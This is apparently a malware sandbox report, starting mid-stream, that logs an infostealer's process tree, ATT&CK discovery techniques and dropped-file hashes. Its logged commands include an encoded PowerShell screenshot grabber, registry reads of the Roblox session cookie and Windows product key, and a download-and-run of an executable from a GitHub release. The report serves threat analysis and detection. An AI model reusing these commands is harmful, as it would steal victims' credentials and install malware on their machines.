ABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vmjvbhs0\vmjvbhs0.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES402D.tmp" "c:\Users\Admin\AppData\Local\Temp\vmjvbhs0\CSC775FADAD1A54ED98763616F494F324.TMP"7⤵
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5104"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 51045⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4740"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 47405⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 332"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 3325⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4960"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 49605⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2252"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 22525⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 612"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 6125⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 3304"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 33045⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1620"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 16205⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵
-
C:\Windows\system32\getmac.exegetmac5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 6060"4⤵
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 60605⤵
- Kills process with taskkill
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI28042\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\8gEbD.zip" *"4⤵
-
C:\Users\Admin\AppData\Local\Temp\_MEI28042\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI28042\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\8gEbD.zip" *5⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Temp1_wti.zip\wti.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_wti.zip\wti.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp1_wti.zip\wti.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_wti.zip\wti.exe"3⤵
- Loads dropped DLL
-
-
-
C:\Users\Public\jsc.exeC:\Users\Public\jsc.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Public\jsc.exeC:\Users\Public\jsc.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\Downloads\wti\winx.exe"C:\Users\Admin\Downloads\wti\winx.exe"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri "https://github.com/newbigs/newintsh/releases/download/v1/JjlTHchjP" -OutFile "C:\Users\Public\Guard.exe""3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
-
C:\Users\Public\Guard.exe"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au34⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\Downloads\wti\wti.exe"C:\Users\Admin\Downloads\wti\wti.exe"2⤵
-
C:\Users\Admin\Downloads\wti\wti.exe"C:\Users\Admin\Downloads\wti\wti.exe"3⤵
- Loads dropped DLL
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /72⤵
- Checks SCSI registry key(s)
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OUVBMzlBNEMtNEJGRi00ODE1LTlBRDgtN0VEMzE5Qjk3RTgyfSIgdXNlcmlkPSJ7NTI1QUE2MEMtQ0I0Ni00NDkwLUI1RUMtQTU5NjExOTUxMUI2fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7RDI3QkRFOEQtNDRDOS00NTNELTkzMEUtREZBQkEwMTYzOUIxfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI0IiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDU5ODUiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxODQ0NDQzNjAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MDc1NjI3NDY0Ii8-PC9hcHA-PC9yZXF1ZXN0Pg1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler1⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_newintsh-1.zip\newintsh-1\gJWmHb2⤵
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Discovery
Browser Information Discovery
1Peripheral Device Discovery
1Process Discovery
1Query Registry
2System Information Discovery
5System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
2Internet Connection Discovery
1Wi-Fi Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
512KB
MD510d201999d219d1e34f3901fe9b3efd4
SHA1ac2127b75a1a7b0ca612d15aaae08a7d22406cfb
SHA25647ea146c6085a1959985ed08d5a5ff13ab0a5efa8b692fa890c33a2dd36bccc3
SHA51237472da31293b4d4d174b17f450f16cca225a718ae790b2621e8bc24038208be25abce0a90bc8c231a78956e7a5978bf5c48d30deb217fc4b5b018f2dd21b7d1
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
323B
MD54af72c00db90b95c23cc32823c5b0453
SHA180f3754f05c09278987cba54e34b76f1ddbee5fd
SHA2565a99dc099cb5297a4d7714af94b14f170d8a0506899c82d6b8231a220f8dba5d
SHA51247aa798c4822bfd0b2a9110fcd1531494da99cf6e4aba5b59bfc36e21fcb1bdb5378189318bbb8519f0e8be732d90637f787ab63997d106bbcff31396155f9ef
-
Filesize
152B
MD5a230789a90c3150dde7ed452a9b35a08
SHA1e934d8dce045c99a5d4ce22d6e470f787ca2e027
SHA256b754b918a9236857008c518409ee816120e5f55430218c03a7c9b2af56cdece3
SHA512f258391b4cfa5f4b7537d15af1af661dc58926a63fbf8238fe564e9e80525fc3b4b04719611d1619e036f56808c460363205ae06c835570b77f97b31009371a6
-
Filesize
152B
MD591aff9098a47bb8e012e47e54f6bceaa
SHA17993f5174f54489cac8b04c1356b7b47da944202
SHA256cc46d5631b8526010ae5e52980fe9fd9b38c4cb27f56cd524b321ab091685cbb
SHA512184defaee159dc93c128c5a7a2ce15e9cbf99bac58ea2372642c30bf6f1f52e178a110e0e86204ba65d82b7a7fd5514cbe7092daacceecb1aab6cc6a208e850b
-
Filesize
483KB
MD561db5cae3c9078e28a5c34b5a1307455
SHA1b16214a8af632d5044caeb5679250b160f86fcb8
SHA256ae6c46b652e74c01bf7a6dd68771861e65e2b0b3ae158c2ad9ff68f739116db0
SHA51279adb5e90259d2b41d9d648227867f22f95de22e32a04dae970ea06bbfdb791765e47dcf9551ccff9206f3b77d2f20a552a5624009a4ba1b4b81fbda568340c6
-
Filesize
1KB
MD55e3a5f7fa113ad0852759984eade53a2
SHA12a8bbdb1216a7fe8cddf0e9e39e9937c176809de
SHA256aad7fb6ce0580097d12410a78830be784a3e60248ae085bb9de0bee12f70343d
SHA512282b3d3c26c3fc1e4bc01b41285000ce871b920b14fed6acba0dc6eee7574b6a07f97897b2578e0a6602b782021e8e29825c787406ea5b0f7d5366c142ef8d9a
-
Filesize
111B
MD5807419ca9a4734feaf8d8563a003b048
SHA1a723c7d60a65886ffa068711f1e900ccc85922a6
SHA256aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631
SHA512f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c
-
Filesize
501B
MD52464c8f99a96c693c39d6bbd47aaf93e
SHA1e3076d1eb9b7714c4ff1d0e9af2a014eac3a26ac
SHA2566083e224e31a389190b3d1df1602e3e6187577ed00051108e71fad82791ba7fe
SHA5123fbe6c5640763343de1c80364b07ea3aef6db9c2619b2488822ff65f81f3dbb7bbcf2153ab709b58e3d51a82a72d5fe38882c2b0df8cd7893fe469441bfbcc1d
-
Filesize
424B
MD5e241615ff8b7984653d581d340312365
SHA1e66ec31f6a74fa31f16b1c5a29fe40447e7a35e7
SHA256600f1deb40341019de316bbc8cc089272e49c24b0935d7abaaedab33433bff77
SHA51226c5228ed9d8df610967cba7c1402d4a746df35782a811f95a31129f15934ccbf4ecb859431460fd5e26ec1f8266f0d264765200a541ca3bd4c5bf294dc3a80b
-
Filesize
6KB
MD533696cb6170494db7c707d5b8fc944e4
SHA11927c2322122afe93b99f27ae9427f2ac5b639b2
SHA256cfeb057afd3196cc5167649e522fb37c71ea3fabaaeaea44ddaaefb5cfb86c49
SHA5125cd48c51703349f7f98bebabcac1246b47f3dc7add4dbaaf231e4c83a7bd150d2099dead34ef8f266f7ae3803b87a8aa96a8e7095fbd32e66f736eb253c9f0ca
-
Filesize
6KB
MD5f2a6a9dba49668334c60558d3401cb4d
SHA108be7b0f729cba089f85ec5dc2bf07fc217baecc
SHA25631d8b75b8f7de4c659331e677b5d42cdf15cbf04d0a4173f027c5a95c493aba8
SHA512cb4039d2de452a8005d68831ee9ec96fac22fa29fbd52573d9ae2fd9543432b72135a448de455cea7b7c256d590cf27b1e5982fdaa183cf7d661b257b4d540db
-
Filesize
6KB
MD5a74a8e8a90e96e56b9784bf8e4a553d4
SHA1afc203559e27d4514ce1e22eca2ee03e99a26041
SHA25629c3d8f92a5fa2614b57735f263d3a5e6ca6d8966ff28933751231aae8c57d62
SHA512699a21268643e39a98f0ee0b0b16b2d624312045a64fe950335bc2b1f2cef8239738aaa068523228c3a4aee2b9b9dcbc2aa54021168415c5fb83096168f62617
-
Filesize
6KB
MD5a71a6fdfe147f915c6f3127c9ac14825
SHA1041c1571cf6f73adb038ebd39e2242473ed3dcf2
SHA256f9a529c737c22ac3a65faecc983eb0097b9e19533f8098e040d5289bd7d5d2e6
SHA512b2c7993232e0a2600511758e90200229c4217c757a95f062e2577627221bf7aa31f8264cf61b03d252d15ebf3fac05da16930ca9a94417af989d6ef3eeb1e15e
-
Filesize
707B
MD51de8c963a61a8068edf9050b30a8a2e7
SHA17b4ec9de8de2ccdd05e106f3f25ddcd8eef4e727
SHA256e3ca6b48589ddc0a1e0d4bf0035784adb5aba92dcbd9a3786b40f6fa46904706
SHA512cf44ed70d1d60cb45883f28aca9ab98219f527abd6aafd088fa9104b6b70720d09963206068cdcc97309a072770296c45096b4e974483340e3a0678792dfd4e6
-
Filesize
875B
MD5a7b635372b744d7c29f6fcd6c07a8f12
SHA153518d840c40b585a55374c429da0b44349196ee
SHA256b8ec434417fab554fee10e0e39bf792f57a33c6db932909f51dad8c076fa3c0b
SHA5124e5b0b964436663ab76e511aa4242075d20bec241740dab9ddff7e73a59d603c67cae7e19488e4002bf4cbd6f39aa835abcca0617311047ba4956be465db22b7
-
Filesize
875B
MD5641b7bc07ac71c1f45813f24934d17fc
SHA1a8c369fa479e6f483a059e8ba341c697cd7ca460
SHA2565491b213a2f89b456f2efdbeca43ab319d7f617ab1aa9c4b833948d4bab171d2
SHA5125ff1c3cf592bbff823405f53025c49a46e74e5557fceefab1bdbcfa1d3ab146b065024feec8895660cee7613a2a158b9193a6e045b492212eb76cf4f9442fb11
-
Filesize
539B
MD525a4704732beac168b2347ffbea8960a
SHA112836c700fa01a2f6620f6a3fdeefaeefbcaefa4
SHA256ec3738f62a34ce4fc32b391dc72331a1d877506861e150f5759f1825e16a4630
SHA5124f8a4bdaaf7892baa2b1b2570467d565e9c250ca35457820f02e3f5652df5e7f00d4cd2671e490a0bc363b015b424e854ddbe9ef552babd53534dc00de078908
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD5cc2f9b6c1089401bb5b4d40096d9f935
SHA1099f22b057cbe5c70fcc5a8f08e583548e02ddd1
SHA2568f8fac89757267fd6e094bfa9c2f5e0c76fc6af8f239d64c051c43c0041552d2
SHA512c71cf1dbde333ede20a529530697288a12fedccf64b741030b1ccac35deba79bf0f7f62508423be7ac6e419c14b79d3f9f1c265d7bcff870229a2123cd690fd4
-
Filesize
11KB
MD5e06e2fbf8b65bc08e91c5fa498ec1f57
SHA16a63ce53f02e7e13e9de55de9fbd27489a232bb2
SHA256a11f2830d8d2d4c231bd42f76a1fbe059921fcba348ba8165939659d8ea911f0
SHA512d83f7513634db0242cd4132998d8de4543ac0df3cd0209af5c0cfd66acda3ead2b10f721c6c142ca6867f180077d45d452e98aeb18b11ea2934f49f86ae378c6
-
Filesize
10KB
MD549cf0fb71b05ba86c2a1f6369d10f2ac
SHA13bff258f1eca8832e6b03ffb2f9653f9689001d1
SHA256cbb7a27d752afe317b01c516a0024d0514dc7e2aa76ba436b347e967f8172f49
SHA51227a3ecd5f8f1f55b9a6707a2d3cee1ffe55095bb9cb572481e1c5d86167592950b596929c6269cc7676f4a258728dc2c4ae09bbfdb8130b66f96b591077ba5e7
-
Filesize
11KB
MD55ed5053708eaa58a93e8d5d622cf58a5
SHA135f4411dbce7dc7ffb021079194bade27936e91d
SHA2560809344011e0e35e96e5700915c0a38776f22db2830a5f15ecf6f63bbd088e0a
SHA512e8593907d63aa87ed45610e8aa3dc23722e4b9d0f21d91a654a7cce3b75a7bb8e68bbe3372bf7d8d6f8c3347b4231c63c7dbb7df5f3f4ae84b5dedc567482ed4
-
Filesize
1KB
